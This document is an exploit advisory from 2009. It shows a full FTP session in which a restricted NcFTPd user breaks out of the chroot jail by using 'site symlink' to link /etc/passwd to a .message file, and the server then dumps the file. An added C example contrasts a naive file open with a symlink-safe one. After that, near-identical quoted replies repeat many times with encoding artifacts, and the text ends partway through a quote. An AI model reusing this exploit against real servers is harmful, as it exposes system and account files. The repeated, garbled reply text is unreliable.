NcFTPd <= 2.8.5 remote jail breakout


Discovered by:
	Kingcope
	Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
	27th July 2009

Greetings:
	Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
	Valid user account.
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
250-#
250-root:*:0:0:Charlie &:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:::::/bin/sh
250
ftp>

+on FreeBSD you can symlink directories like ´/´

Cheerio,

Kingcope
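
The transcript above shows a restricted session reading a file outside its root because a symlink named `.message` was followed when the directory message was displayed. As an added example (not part of the original advisory and not NcFTPd code), the C below sets an assumed naive lookup beside a confined one that walks from a descriptor on the user's root with `openat()` and `O_NOFOLLOW`; all function names, the `/tmp` jail layout and the file contents are constructed for illustration.

```c
/* Added example, not NcFTPd source: every function name here is hypothetical. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed naive form: join root and path, then open(). open() follows
 * symlinks, so a link named .message is read wherever it points. */
int open_message_naive(const char *root, const char *vpath)
{
    char full[PATH_MAX];
    int n = snprintf(full, sizeof full, "%s/%s", root, vpath);
    return (n < 0 || (size_t)n >= sizeof full) ? -1 : open(full, O_RDONLY);
}

/* Confined form: walk from a descriptor on the user's root, one component
 * at a time, never following a symlink, and serve regular files only. */
int open_message_confined(int rootfd, const char *vpath)
{
    char buf[PATH_MAX], *save = NULL, *comp, *next;
    struct stat st;
    int dirfd, fd;

    if (strlen(vpath) >= sizeof buf || (dirfd = dup(rootfd)) < 0)
        return -1;
    strcpy(buf, vpath);
    for (comp = strtok_r(buf, "/", &save); comp != NULL; comp = next) {
        next = strtok_r(NULL, "/", &save);
        if (strcmp(comp, "..") == 0)
            break;                     /* never climb above the root */
        fd = openat(dirfd, comp, O_RDONLY | O_NOFOLLOW | O_CLOEXEC |
                    (next != NULL ? O_DIRECTORY : O_NONBLOCK));
        close(dirfd);
        if (fd < 0)
            return -1;                 /* fails when comp is a symlink */
        if (next != NULL) {
            dirfd = fd;                /* descend and keep walking */
            continue;
        }
        if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode))
            return fd;
        close(fd);
        return -1;                     /* directory, FIFO, device, ... */
    }
    close(dirfd);
    return -1;
}

static int write_file(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    return (f != NULL && fputs(text, f) >= 0 && fclose(f) == 0) ? 0 : -1;
}
static void join(char *out, const char *a, const char *b) { snprintf(out, PATH_MAX, "%s/%s", a, b); }
static int opened(int fd) { return fd < 0 ? 0 : (close(fd), 1); }

/* Builds a constructed jail under /tmp and returns a bitmask:
 * 1 = naive open followed the .message link, 2 = confined open followed it,
 * 4 = confined open served a regular .message, 8 = confined open crossed a
 * symlinked directory. */
int run_demo(void)
{
    char jail[] = "/tmp/jailXXXXXX", outside[] = "/tmp/outsideXXXXXX";
    char secret[PATH_MAX], dir1[PATH_MAX], link1[PATH_MAX];
    char dir2[PATH_MAX], msg2[PATH_MAX], link2[PATH_MAX];
    int rootfd, result;

    if (mkdtemp(jail) == NULL || mkdtemp(outside) == NULL)
        return -1;
    join(secret, outside, "secret");
    join(dir1, jail, "isowarez"); join(link1, dir1, ".message");
    join(dir2, jail, "pub");      join(msg2, dir2, ".message");
    join(link2, jail, "esc");
    if (write_file(secret, "constructed secret\n") != 0 ||
        mkdir(dir1, 0700) != 0 || symlink(secret, link1) != 0 ||
        mkdir(dir2, 0700) != 0 || write_file(msg2, "welcome\n") != 0 ||
        symlink(outside, link2) != 0 ||
        (rootfd = open(jail, O_RDONLY | O_DIRECTORY)) < 0)
        return -1;
    result = opened(open_message_naive(jail, "isowarez/.message"))
           | (opened(open_message_confined(rootfd, "isowarez/.message")) << 1)
           | (opened(open_message_confined(rootfd, "/pub/.message")) << 2)
           | (opened(open_message_confined(rootfd, "esc/secret")) << 3);
    close(rootfd);
    unlink(link1); unlink(msg2); unlink(link2); unlink(secret);
    rmdir(dir1); rmdir(dir2); rmdir(jail); rmdir(outside);
    return result;
}

int main(void)
{
    int r = run_demo();
    printf("result bitmask = %d (expected 5: only bits 1 and 4 set)\n", r);
    return r == 5 ? 0 : 1;
}
```

The same component-by-component walk also covers the symlinked-directory case mentioned at the end of the advisory, since an intermediate component that is a link fails to open.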


Replies to this exploit:

From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify, the NcFTPd vulnerability affects all operating systems that NcFTPd runs on, not just FreeBSD.

Cheers,

kcope





From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
